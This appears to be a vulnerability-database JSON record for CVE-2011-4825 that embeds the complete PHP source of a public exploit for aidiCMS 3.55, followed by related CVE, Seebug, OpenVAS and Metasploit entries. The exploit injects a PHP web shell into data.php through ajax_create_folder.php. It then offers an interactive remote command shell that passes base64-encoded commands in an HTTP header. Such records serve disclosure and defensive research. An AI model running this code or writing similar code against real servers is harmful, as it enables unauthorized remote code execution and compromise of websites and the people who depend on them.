aidiCMS 3.55 - ajax_create_folder.php Remote Code Execution

{"bulletinFamily": "exploit", "id": "EDB-ID:18085", "cvelist": ["CVE-2011-4825"], "modified": "2011-11-05T00:00:00", "lastseen": "2016-02-02T09:09:08", "edition": 1, "sourceData": "<?php\r\n\r\n/*\r\n --------------------------------------------------------------------\r\n aidiCMS v3.55 (ajax_create_folder.php) Remote Code Execution Exploit\r\n --------------------------------------------------------------------\r\n \r\n author............: Egidio Romano aka EgiX\r\n mail..............: n0b0d13s[at]gmail[dot]com\r\n software link.....: http://code.google.com/p/aidicms/\r\n \r\n +-------------------------------------------------------------------------+\r\n | This proof of concept code was written for educational purpose only. |\r\n | Use it at your own risk. Author will be not responsible for any damage. |\r\n +-------------------------------------------------------------------------+\r\n \r\n [-] Vulnerability overview:\r\n \r\n aidiCMS v3.55 is affected by the vulnerability that I reported to http://www.exploit-db.com/exploits/18075/\r\n \r\n [-] Disclosure timeline:\r\n \r\n [23/10/2011] - Vulnerability discovered\r\n [24/10/2011] - Issue reported to http://code.google.com/p/aidicms/issues/detail?id=3\r\n [26/10/2011] - Project members contacted via e-mail\r\n [04/11/2011] - Still no response received\r\n [05/11/2011] - Public disclosure\r\n\r\n*/\r\n\r\nerror_reporting(0);\r\nset_time_limit(0);\r\nini_set(\"default_socket_timeout\", 5);\r\n\r\nfunction http_send($host, $packet)\r\n{\r\n if (!($sock = fsockopen($host, 80)))\r\n die( \"\\n[-] No response from {$host}:80\\n\");\r\n\r\n fwrite($sock, $packet);\r\n return stream_get_contents($sock);\r\n}\r\n\r\nprint \"\\n+-----------------------------------------------------+\";\r\nprint \"\\n| aidiCMS v3.55 Remote Code Execution Exploit by EgiX |\";\r\nprint \"\\n+-----------------------------------------------------+\\n\";\r\n\r\nif ($argc < 3)\r\n{\r\n print \"\\nUsage......: php $argv[0] <host> <path>\\n\";\r\n print \"\\nExample....: php $argv[0] localhost /\";\r\n print \"\\nExample....: php $argv[0] localhost /aidicms/\\n\";\r\n die();\r\n}\r\n\r\n$host = $argv[1];\r\n$path = $argv[2];\r\n\r\n$payload = \"foo=<?php error_reporting(0);print(_code_);passthru(base64_decode(\\$_SERVER[HTTP_CMD]));die; ?>\";\r\n$packet = \"POST {$path}modul/tinymce/plugins/ajaxfilemanager/ajax_create_folder.php HTTP/1.0\\r\\n\";\r\n$packet .= \"Host: {$host}\\r\\n\";\r\n$packet .= \"Content-Length: \".strlen($payload).\"\\r\\n\";\r\n$packet .= \"Content-Type: application/x-www-form-urlencoded\\r\\n\";\r\n$packet .= \"Connection: close\\r\\n\\r\\n{$payload}\";\r\n\r\nhttp_send($host, $packet);\r\n\r\n$packet = \"GET {$path}modul/tinymce/plugins/ajaxfilemanager/inc/data.php HTTP/1.0\\r\\n\";\r\n$packet .= \"Host: {$host}\\r\\n\";\r\n$packet .= \"Cmd: %s\\r\\n\";\r\n$packet .= \"Connection: close\\r\\n\\r\\n\";\r\n\r\nwhile(1)\r\n{\r\n print \"\\naidicms-shell# \";\r\n if (($cmd = trim(fgets(STDIN))) == \"exit\") break;\r\n preg_match(\"/_code_(.*)/s\", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ?\r\n print $m[1] : die(\"\\n[-] Exploit failed!\\n\");\r\n}\r\n\r\n?>", "published": "2011-11-05T00:00:00", "href": "https://www.exploit-db.com/exploits/18085/", "osvdbidlist": ["76928"], "reporter": "EgiX", "hash": "c2d7f5310fda413cfd99aa66bbb79e2624133abd4f1385d59138f9ae805a5c48", "title": "aidiCMS 3.55 - ajax_create_folder.php Remote Code Execution", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "aidiCMS 3.55 - (ajax_create_folder.php) Remote Code Execution. CVE-2011-4825. Webapps exploit for php platform", "references": [], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/18085/", "enchantments": {"vulnersScore": 3.3}}

{"result": {"cve": [{"id": "CVE-2011-4825", "type": "cve", "title": "CVE-2011-4825", "description": "Static code injection vulnerability in inc/function.base.php in Ajax File and Image Manager before 1.1, as used in tinymce before 1.4.2, phpMyFAQ 2.6 before 2.6.19 and 2.7 before 2.7.1, and possibly other products, allows remote attackers to inject arbitrary PHP code into data.php via crafted parameters.", "published": "2011-12-14T22:57:34", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4825", "cvelist": ["CVE-2011-4825"], "lastseen": "2016-09-03T15:58:08"}], "seebug": [{"id": "SSV-72961", "type": "seebug", "title": "Log1 CMS writeInfo() PHP Code Injection", "description": "Summary: \nAjax File and Image Manager is a PHP-based document and image management system for managing a remote document with an image. Ajax File and Image Manager 1.1 and prior versions. inc/function. base. php in the presence of static code injection vulnerability. The vulnerability exists in tinymce 1.4.2 previous version, phpMyFAQ 2.6. 19 before 2. 6 version and 2. 7. 1 before the 2. 7 version and possibly other versions, a remote attacker can use specially crafted parameters to the data. php inject arbitrary PHP code.\n", "published": "2014-07-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.seebug.org/vuldb/ssvid-72961", "cvelist": ["CVE-2011-4825"], "lastseen": "2016-07-26T11:27:29"}, {"id": "SSV-72306", "type": "seebug", "title": "aidiCMS 3.55 - (ajax_create_folder.php) Remote Code Execution", "description": "Summary: \nAjax File and Image Manager is a PHP-based document and image management system for managing a remote document with an image. Ajax File and Image Manager 1.1 and prior versions. inc/function. base. php in the presence of static code injection vulnerability. The vulnerability exists in tinymce 1.4.2 previous version, phpMyFAQ 2.6. 19 before 2. 6 version and 2. 7. 1 before the 2. 7 version and possibly other versions, a remote attacker can use specially crafted parameters to the data. php inject arbitrary PHP code.\n", "published": "2014-07-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.seebug.org/vuldb/ssvid-72306", "cvelist": ["CVE-2011-4825"], "lastseen": "2016-07-28T13:03:33"}, {"id": "SSV-72297", "type": "seebug", "title": "Ajax File and Image Manager 1.0 Final - Remote Code Execution Vulnerability", "description": "Summary: \nAjax File and Image Manager is a PHP-based document and image management system for managing a remote document with an image. Ajax File and Image Manager 1.1 and prior versions. inc/function. base. php in the presence of static code injection vulnerability. The vulnerability exists in tinymce 1.4.2 previous version, phpMyFAQ 2.6. 19 before 2. 6 version and 2. 7. 1 before the 2. 7 version and possibly other versions, a remote attacker can use specially crafted parameters to the data. php inject arbitrary PHP code.\n", "published": "2014-07-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.seebug.org/vuldb/ssvid-72297", "cvelist": ["CVE-2011-4825"], "lastseen": "2016-07-28T09:02:43"}, {"id": "SSV-72304", "type": "seebug", "title": "Zenphoto <= 1.4.1.4 (ajax_create_folder.php) Remote Code Execution", "description": "Summary: \nAjax File and Image Manager is a PHP-based document and image management system for managing a remote document with an image. Ajax File and Image Manager 1.1 and prior versions. inc/function. base. php in the presence of static code injection vulnerability. The vulnerability exists in tinymce 1.4.2 previous version, phpMyFAQ 2.6. 19 before 2. 6 version and 2. 7. 1 before the 2. 7 version and possibly other versions, a remote attacker can use specially crafted parameters to the data. php inject arbitrary PHP code.\n", "published": "2014-07-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.seebug.org/vuldb/ssvid-72304", "cvelist": ["CVE-2011-4825"], "lastseen": "2016-07-28T12:06:10"}, {"id": "SSV-72356", "type": "seebug", "title": "Log1CMS 2.0 (ajax_create_folder.php) Remote Code Execution", "description": "Summary: \nAjax File and Image Manager is a PHP-based document and image management system for managing a remote document with an image. Ajax File and Image Manager 1.1 and prior versions. inc/function. base. php in the presence of static code injection vulnerability. The vulnerability exists in tinymce 1.4.2 previous version, phpMyFAQ 2.6. 19 before 2. 6 version and 2. 7. 1 before the 2. 7 version and possibly other versions, a remote attacker can use specially crafted parameters to the data. php inject arbitrary PHP code.\n", "published": "2014-07-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.seebug.org/vuldb/ssvid-72356", "cvelist": ["CVE-2011-4825"], "lastseen": "2016-07-29T10:39:11"}, {"id": "SSV-72305", "type": "seebug", "title": "phpMyFAQ <= 2.7.0 (ajax_create_folder.php) Remote Code Execution", "description": "Summary: \nAjax File and Image Manager is a PHP-based document and image management system for managing a remote document with an image. Ajax File and Image Manager 1.1 and prior versions. inc/function. base. php in the presence of static code injection vulnerability. The vulnerability exists in tinymce 1.4.2 previous version, phpMyFAQ 2.6. 19 before 2. 6 version and 2. 7. 1 before the 2. 7 version and possibly other versions, a remote attacker can use specially crafted parameters to the data. php inject arbitrary PHP code.\n", "published": "2014-07-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.seebug.org/vuldb/ssvid-72305", "cvelist": ["CVE-2011-4825"], "lastseen": "2016-07-28T12:41:52"}], "exploitdb": [{"id": "EDB-ID:18975", "type": "exploitdb", "title": "Log1 CMS writeInfo PHP Code Injection", "description": "Log1 CMS writeInfo() PHP Code Injection. CVE-2011-4825. Webapps exploit for php platform", "published": "2012-06-03T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/18975/", "cvelist": ["CVE-2011-4825"], "lastseen": "2016-02-02T10:49:07"}, {"id": "EDB-ID:18083", "type": "exploitdb", "title": "Zenphoto <= 1.4.1.4 - ajax_create_folder.php Remote Code Execution", "description": "Zenphoto <= 1.4.1.4 - (ajax_create_folder.php) Remote Code Execution. CVE-2011-4825. Webapps exploit for php platform", "published": "2011-11-05T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/18083/", "cvelist": ["CVE-2011-4825"], "lastseen": "2016-02-02T09:08:51"}, {"id": "EDB-ID:18075", "type": "exploitdb", "title": "Ajax File and Image Manager 1.0 Final - Remote Code Execution Vulnerability", "description": "Ajax File and Image Manager 1.0 Final - Remote Code Execution Vulnerability. CVE-2011-4825. Webapps exploit for php platform", "published": "2011-11-04T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/18075/", "cvelist": ["CVE-2011-4825"], "lastseen": "2016-02-02T09:07:44"}, {"id": "EDB-ID:18151", "type": "exploitdb", "title": "Log1CMS 2.0 - ajax_create_folder.php Remote Code Execution", "description": "Log1CMS 2.0 - (ajax_create_folder.php) Remote Code Execution. CVE-2011-4825. Webapps exploit for php platform", "published": "2011-11-24T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/18151/", "cvelist": ["CVE-2011-4825"], "lastseen": "2016-02-02T09:15:52"}, {"id": "EDB-ID:18084", "type": "exploitdb", "title": "phpMyFAQ <= 2.7.0 ajax_create_folder.php Remote Code Execution", "description": "phpMyFAQ <= 2.7.0 (ajax_create_folder.php) Remote Code Execution. CVE-2011-4825. Webapps exploit for php platform", "published": "2011-11-05T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/18084/", "cvelist": ["CVE-2011-4825"], "lastseen": "2016-02-02T09:08:59"}], "openvas": [{"id": "OPENVAS:1361412562310103334", "type": "openvas", "title": "Ajax File and Image Manager 'data.php' PHP Code Injection Vulnerability", "description": "Ajax File and Image Manager is prone to a remote PHP code-injection\n vulnerability.", "published": "2011-11-07T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103334", "cvelist": ["CVE-2011-4825"], "lastseen": "2017-07-02T21:13:41"}, {"id": "OPENVAS:1361412562310103496", "type": "openvas", "title": "Log1 CMS 'data.php' PHP Code Injection Vulnerability", "description": "Log1 CMS is prone to a remote PHP code-injection vulnerability.", "published": "2012-06-18T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103496", "cvelist": ["CVE-2011-4825"], "lastseen": "2017-07-02T21:10:36"}], "metasploit": [{"id": "MSF:EXPLOIT/MULTI/HTTP/LOG1CMS_AJAX_CREATE_FOLDER", "type": "metasploit", "title": "Log1 CMS writeInfo() PHP Code Injection", "description": "This module exploits the \"Ajax File and Image Manager\" component that can be found in log1 CMS. In function.base.php of this component, the 'data' parameter in writeInfo() allows any malicious user to have direct control of writing data to file data.php, which results in arbitrary remote code execution.", "published": "2012-06-02T06:51:20", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.rapid7.com/db/modules/exploit/multi/http/log1cms_ajax_create_folder", "cvelist": ["CVE-2011-4825"], "lastseen": "2017-07-24T20:03:06"}], "packetstorm": [{"id": "PACKETSTORM:113226", "type": "packetstorm", "title": "Log1 CMS writeInfo() PHP Code Injection", "description": "", "published": "2012-06-03T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://packetstormsecurity.com/files/113226/Log1-CMS-writeInfo-PHP-Code-Injection.html", "cvelist": ["CVE-2011-4825"], "lastseen": "2016-12-05T22:20:36"}]}}